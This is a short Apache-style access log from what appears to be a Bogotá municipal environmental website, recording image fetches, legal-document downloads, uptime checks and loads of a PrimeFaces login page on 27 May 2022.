173.252.107.5 - - [27/May/2022:07:20:01 -0500] "GET /images/operativos-control-residuos-hospitalarios-4-abril.jpeg HTTP/1.1" 200 58998
69.63.184.117 - - [27/May/2022:07:20:02 -0500] "GET /images/acopiadores-llantas-control-2-abril.jpeg HTTP/1.1" 200 34334
69.63.184.117 - - [27/May/2022:07:20:03 -0500] "GET /images/llantas-teusaquillo-1-abril.jpg HTTP/1.1" 200 50674
173.252.107.17 - - [27/May/2022:07:20:05 -0500] "GET /images/interpretes-humedales-principal-26-marzo.jpg HTTP/1.1" 200 40211
69.171.251.13 - - [27/May/2022:07:20:05 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
69.63.189.5 - - [27/May/2022:07:20:06 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
69.63.189.119 - - [27/May/2022:07:20:08 -0500] "GET /images/jornada-llantaton-usaquen-24-marzo.jpg HTTP/1.1" 200 41830
69.63.189.120 - - [27/May/2022:07:20:09 -0500] "GET /images/dia-agua-participantes-22-marzo.jpg HTTP/1.1" 200 53143
69.63.184.5 - - [27/May/2022:07:20:11 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
173.252.107.120 - - [27/May/2022:07:20:12 -0500] "GET /images/llantaton-jornada.jpg HTTP/1.1" 200 356045
173.252.107.3 - - [27/May/2022:07:20:14 -0500] "GET /images/ecositemas-cerros-10-marzo.jpg HTTP/1.1" 200 85534
69.63.184.2 - - [27/May/2022:07:20:20 -0500] "GET /images/Memo1.jpg HTTP/1.1" 200 91151
173.252.107.19 - - [27/May/2022:07:20:22 -0500] "GET /images/reunion-plan-accion-calidad-aire-7-marzo.jpeg HTTP/1.1" 200 62356
173.252.107.17 - - [27/May/2022:07:20:24 -0500] "GET /images/cronica-ambiental-28.jpg HTTP/1.1" 200 50693
69.63.184.117 - - [27/May/2022:07:20:25 -0500] "GET /images/Quebrada1.jpg HTTP/1.1" 200 77711
172.22.2.4 - - [27/May/2022:07:18:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.8 - - [27/May/2022:07:20:58 -0500] "GET /bla/resoluciones/resoluciones%202012/0724.pdf HTTP/1.1" 200 364737
108.174.8.23 - - [27/May/2022:07:21:00 -0500] "GET /sumate-a-las-jornadas-de-recoleccion-de-llantas-de-esta-semana.html HTTP/1.1" 206 787
216.245.221.92 - - [27/May/2022:07:21:56 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/May/2022:07:21:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44152
186.179.100.179 - - [27/May/2022:07:23:08 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 200 734
201.245.192.253 - - [27/May/2022:07:22:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47110
172.22.2.4 - - [27/May/2022:07:23:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:24:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [27/May/2022:07:26:57 -0500] "HEAD / HTTP/1.1" 200 -
186.30.78.34 - - [27/May/2022:07:27:09 -0500] "GET /BLA/resoluciones/AUTOS%202011/3717.pdf HTTP/1.1" 200 366817
181.51.34.90 - - [27/May/2022:07:30:06 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html HTTP/1.1" 200 890
173.252.127.6 - - [27/May/2022:07:30:35 -0500] "GET /indicadores-de-fauna-silvestre-en-el-observatorio-ambiental-de-bogota.html?fbclid=IwAR3RK0FzUcyjghL9GwweTFUnB_suEk3FQjmEeG0J9uWT1C5lptEhsJgbW9w HTTP/1.1" 200 949
157.245.70.127 - - [27/May/2022:07:30:43 -0500] "GET /ab2g HTTP/1.1" 400 946
157.245.70.127 - - [27/May/2022:07:30:43 -0500] "GET /ab2h HTTP/1.1" 400 946
207.46.13.179 - - [27/May/2022:07:31:06 -0500] "GET /Publicaciones/2022EE26338.pdf HTTP/1.1" 404 227
172.22.2.4 - - [27/May/2022:07:29:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/May/2022:07:31:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:30:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
201.245.192.253 - - [27/May/2022:07:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44152
201.245.192.253 - - [27/May/2022:07:32:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47110
191.146.145.44 - - [27/May/2022:07:35:00 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
191.146.145.44 - - [27/May/2022:07:35:00 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
191.146.145.44 - - [27/May/2022:07:35:01 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.146.145.44 - - [27/May/2022:07:35:14 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12170
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
191.146.145.44 - - [27/May/2022:07:35:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
191.146.145.44 - - [27/May/2022:07:35:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
191.146.145.44 - - [27/May/2022:07:35:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
191.146.145.44 - - [27/May/2022:07:35:17 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
191.146.145.44 - - [27/May/2022:07:35:17 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
191.146.145.44 - - [27/May/2022:07:35:17 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12170
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.146.145.44 - - [27/May/2022:07:35:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [27/May/2022:07:35:39 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
186.102.33.28 - - [27/May/2022:07:36:42 -0500] "GET /medida-preventiva-por-afectacion-al-humedal-de-techo.html HTTP/1.1" 200 779
216.245.221.92 - - [27/May/2022:07:36:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:35:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
